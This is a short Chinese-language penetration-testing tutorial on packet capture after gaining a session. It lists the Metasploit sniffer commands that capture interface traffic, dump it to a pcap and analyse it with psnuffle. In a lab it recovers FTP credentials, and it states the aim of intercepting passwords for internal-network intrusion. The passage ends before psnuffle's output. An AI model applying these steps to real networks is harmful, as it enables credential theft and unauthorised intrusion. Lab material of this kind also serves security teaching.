为什么要进行数据包的捕获：当我们获得一个机器的权限后，可以通过对数据包的分析，判读内网中的服务，并且可以截获一些密码和重要数据，如：mail、http、svn、ftp等，为内网渗透打开大门。

利用msf下sniffer模块进行数据包捕获
msf获得session后使用命令load sniffer加载sniffer模块
接着可以使用命令sniffer_interfaces可以列举出网卡信息

可以看到有两个网卡的信息

使用命令sniffer_start 2开始捕获网卡id 2的数据包

命令sniffer_stats 2查看网卡id 2的捕获状态

在靶机中登录到其他主机的ftp服务中
命令sniffer_dump 2 test.cap将网卡id 2中捕获的信息导出到家目录的test.cap中，然后用wireshark打开

看到靶机登录了ip为192.168.83.91的ftp服务器中，并且账号为test，密码为123456

命令sniffer_stop 2停止捕获，sniffer_release 2将内存释放

使用psnuffle进行数据包分析
use auxiliary/sniffer/psnuffle使用该模块
set pcapfile /root/test.cap设置需要分析的数据包的路径
运行，结果：